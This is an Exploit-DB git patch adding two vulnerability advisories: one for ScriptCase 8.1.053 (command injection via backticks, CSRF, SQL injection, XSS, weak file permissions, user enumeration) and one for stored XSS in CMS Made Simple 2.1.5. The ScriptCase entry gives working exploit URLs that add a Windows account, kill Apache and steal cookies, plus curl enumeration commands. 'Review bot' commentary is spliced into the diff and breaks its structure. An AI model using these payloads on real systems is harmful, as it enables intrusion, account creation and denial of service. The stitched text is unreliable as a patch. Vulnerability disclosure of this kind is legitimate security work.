From 4c5719d98f5bedda1a02331759b472bb2d8e0784 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 21 Nov 2016 05:01:19 +0000
Subject: [PATCH] DB: 2016-11-21

2 new exploits
ScriptCase 8.1.053 - Multiple Vulnerabilities
CMS Made Simple 2.1.5 - Cross-Site Scripting
---
 files.csv | 2 +
 platforms/php/webapps/40791.txt | 382 ++++++++++++++++++++++++++++++++
 platforms/php/webapps/40792.txt | 21 ++
 3 files changed, 405 insertions(+)
 create mode 100755 platforms/php/webapps/40791.txt
 create mode 100755 platforms/php/webapps/40792.txt

diff --git a/files.csv b/files.csv
index 9ec3f38ed..c8dee1b1c 100755
--- a/files.csv
+++ b/files.csv
@@ -36791,3 +36791,5 @@ id,file,description,date,author,platform,type,port
 40782,platforms/php/webapps/40782.txt,"Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0
 40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0
 40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0
+40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0
+40792,platforms/php/webapps/40792.txt,"CMS Made Simple 2.1.5 - Cross-Site Scripting",2016-11-01,"liu zhu",php,webapps,0
diff --git a/platforms/php/webapps/40791.txt b/platforms/php/webapps/40791.txt
new file mode 100755
index 000000000..d648f242a
--- /dev/null
+++ b/platforms/php/webapps/40791.txt
@@ -0,0 +1,382 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/SCRIPTCASE-PHP-WEB-TOOL-MULTIPLE-VULNERABILITIES.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.scriptcase.net + + + +Product: +=================== +ScriptCase +v8.1.053, v8.1.051, v8.1.43.0 + +scriptcase_install_en_us_v8.1.053.exe +hash: ceaba1fce05556b82ab37582a7c907f4 + +scriptcase_install_en_us_v8.1.051.exe +hash: c3c9fbe085ab5462304c0c73c8698946 + + +ScriptCase RAD is a development platform for PHP applications, is web +oriented and can be installed in a server in the internet. + + + +Vulnerability Type: +============================= +CSRF Remote Command Execution +CSRF Add Admin +SQL Injection +Cross Site Scripting +Local Privlege Escalation (Insecure File Permissions) +User Enumeration / Token Bypass + +Downloaded latest version v8.1.053, and still vulnerable. + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +[CSRF Remote Command Execution] +Scriptcase has a remote command execution ailment via CSRF, if an +authenticated user clicks an attacker link etc. This can allow attackers +to run arbitrary system commands on the affected host and do things like +add accounts etc. + +Scriptcase PHP code uses encryption / obfuscated so its not easy testing +but we can see here the error returned for PHP eval()'d code +when injecting an Array [] brackets or something as paremeter. + +Parse error: syntax error, unexpected end of file, expecting ']' in C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase\devel\lib\php\functions2.inc.php(358) : eval()'d code on line 1 + +After trying to wrap a Windows system call in backtick "`" operators it +worked perfectly. This allowed me to add an arbitrary system +account to the affected system. 
+ + + +[CSRF] +There are several cross site request forgery vectors, allowing attackers to +add an Admin account to Scriptcase application etc. + + +[Cross Site Scripting] +Multiple XSS entry points exists within the vulnerable application both GET +and POST. + +Example XSS vulnerable scriptcase code 'ajax_cod_apls' is not santized +before being processed by ajax HTTP post request. + +$.ajax({ +type: 'POST', +url: '/scriptcase/devel/iface/generate.php', +data: +'compile_app_ajax=S&gen_option=console&targ_frame=_self&console=yes&ajax_cod_apls=' ++ str_open_apps, +success: function(s_result){ +a_result = s_result.split('__compile_ajax_sep_row__'); +nm_compile_gerar(); +} +}); + + + +[Local Privilege Escalation] +scriptcase uses weak insecure file permissions as the “Everyone” group has +full access on it. Allowing low privileged users to +execute arbitrary code in the security context of ANY other users with +elevated privileges on the affected system. + +"Everyone" encompasses all users who have logged in with a password as well +as built-in, non-password protected accounts such as Guest +and LOCAL_SERVICE.Any user (even guest) will be able to replace, modify or +change the file. This would allow an attacker the ability +to inject code or replace scriptcase used executables and have it run in +the context of the system. + + + +[User Enumeration] +On failed scriptcase login the application returns one of the following in +the HTTP response. + +"The login name provided is not registered on the system." +On a failed password but correct user name entered application HTTP +response returns. +"The password is incorrect." + + + + +Exploit code(s): +=============== + +[CSRF Remote Command Execution] + +Note: we NEED to use backtick operators "`" + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start net user EVIL abc123 /add` + +Verify... 
+ +c:\> net user + +User accounts for \\hyp3rlinx +------------------------------------------------------------------------ +Administrator hyp3rlinx Guest +EVIL Test Privileged-User + + +2) start Windows 'calc.exe' +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`calc.exe` + +OR + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start +calc.exe` + +**sometimes "calc.exe" doesnt appear but it is running use "tasklist /v | +findstr calc.exe" to verify it is in fact running. + + +4) Apache DOS (needs httpd environmental variable set) +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`taskkill /f /im httpd.exe` + + + +[SQL Injection] + +AND boolean-based blind - WHERE or HAVING clause in 'nrLinhas' parameter "10 AND 2=2" + +
+ + + + + + + + + + + +
+ + + +[CSRF Add Admin] + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +[CSRF mysql connect creation wizard] + +
+ + + + + + + + + + +
+ + + +[Cross Site Scripting] - Successful in Firefox + +XSS 1) + +http://127.0.0.1:8081/scriptcase/devel/iface/app_import.php?option=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + + +XSS 2) + +http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + + +XSS 3) + +
+ + + + + + +
+ + +XSS 4) + +
+ + + + + + + + + + + +
+ + + +[Local Privilege Escalations] + +Proof. + +C:\Program Files (x86)\NetMake\v81\components>cacls * | findstr Everyone | +more +C:\Program Files (x86)\NetMake\v81\components\apache Everyone:(ID)F + +Everyone:(OI)(CI)(IO)(ID) +C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x64.msi +Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x86.msi +Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\components\php Everyone:(ID)F +Everyone:(OI)(CI)(IO)(ID)F + + +C:\Program Files (x86)\NetMake\v81\wwwroot>cacls * | findstr Everyone | more +C:\Program Files (x86)\NetMake\v81\wwwroot\favicon.ico Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\index.php Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\robots.txt Everyone:(ID)F +C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase Everyone:(ID)F + +Everyone:(OI)(CI)(IO)(ID)F + + + +[User Account Enumeration / Token Bypass] + +First off the stupid token used on the login FORM e.g. "form_login=" +is totally useless you can put anything you like in it +and the application will happily process the request. + + +CURL Enumeration 1) +curl -i -v -X POST +http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d +field_user=BOZO -d field_pass=1 -d ajax=nm -d option=login -d +form_login=STUPID-TOKEN -d language=en_US + +HTTP Response: +"error1:The login name provided is not registered on the system." + +CURL Enumeration 2) +curl -i -v -X POST +http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d +field_user=admin -d field_pass=1 -d ajax=nm -d option=login -d +form_login=STUPID-TOKEN -d language=en_US + +HTTP Response: +"error1:The password is incorrect." + +Either way we know when we hit a valid account. 
+
+
+
+Disclosure Timeline:
+=========================================
+Vendor Notification: October 13, 2016
+Vendor acknowledgement: October 14, 2016
+Vendor request POC video: October 14, 2016
+Sent vendor video link: October 14, 2016
+Request update from vendor: October 17, 2016
+Vendor reply: "under review"
+Vendor requests video again: October 25, 2016
+Request update from vendor: October 30, 2016
+Vendor reply: "No information"
+Request ETA: November 7, 2016
+Request status: November 14, 2016
+Vendor Unresponsive No More Replies
+November 20, 2016 : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Remote / Local
+
+
+
+Severity Level:
+================
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/platforms/php/webapps/40792.txt b/platforms/php/webapps/40792.txt
new file mode 100755
index 000000000..743230257
--- /dev/null
+++ b/platforms/php/webapps/40792.txt
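Review bot: The "CSRF Remote Command Execution" heading misstates the root cause: the quoted parse error (`functions2.inc.php(358) : eval()'d code`) and the working payload `popup_sql_script.php?sql_script=`start net user EVIL abc123 /add`` show the `sql_script` parameter reaching PHP `eval()`, where the backtick is the shell-execution operator, so this is authenticated code/command injection and CSRF is only the delivery vector because the GET endpoint carries no anti-forgery token. The advisory should also say which account the injected command runs under; `net user /add` succeeding suggests the Apache service runs with local administrator rights, which is a separate hardening finding operators need to know about. The "Everyone:(ID)F" ACLs on `components\apache` and `components\php` compound the injection, since any local user can replace the very binaries the remote attacker's commands execute through. For triage, the ignored `form_login` token means the login form itself is forgeable, and the distinct "not registered" / "password is incorrect" responses from `login.php` should be collapsed into one generic failure message in the same fix. No CVE was assigned at disclosure, so a CVE request would make these findings trackable as separate issues rather than one "Multiple Vulnerabilities" entry.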
@@ -0,0 +1,21 @@
+ Exploit Title: CMS made simple Persistent XSS vulnerability
+Date:2016-11-01
+Exploit Author: liu zhu
+Vendor Homepage:http://www.cmsmadesimple.org/
+Software Link:http://101.110.118.22/s3.amazonaws.com/cmsms/downloads/13469/cmsms-2.1.5-install.zip
+Version:2.1.5
+Tested on:chrome/firefox
+
+details:
+Adminlog.php is used to record the operation log of the administrator and the
+website editor. It does not filter the XSS script. So The website editors(lower
+Privilege user) can attack the administrator, such as XSS phishing,CSRF.
+
+The steps to reproduce are below:
+1. The website editor logs in and click "Content->news". input any XSS script(such as "") in title and submit.
+
+2. Then the administrator log in and click "site admin- admin log" , the XSS script will be triggered.
+
+Affact:
+The vulnerability can be used to XSS Phishing or Cookie stolen attack
+
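Review bot: The proof-of-concept payload in step 1 is missing — `input any XSS script(such as "")` has an empty quoted string where the test value belonged, so a reader cannot reproduce the finding; a concrete payload such as `<script>alert(document.domain)</script>` placed in the news title should be restored. The affected component should be named more precisely: the text blames `Adminlog.php` for not filtering, but the injection point is the news item title and the sink is the admin-log page, so "stored XSS via news title, rendered unescaped in Site Admin → Admin Log" would tell a reader exactly where input and output are. "Affact" should read "Impact", and that sentence should note that cookie theft depends on the admin session cookie lacking the HttpOnly flag, while the phishing and forged-action impact remains either way since the script runs in the administrator's authenticated context. No vendor notification date or CVE appears, so a one-line disclosure timeline would help consumers of this record judge whether a fix exists.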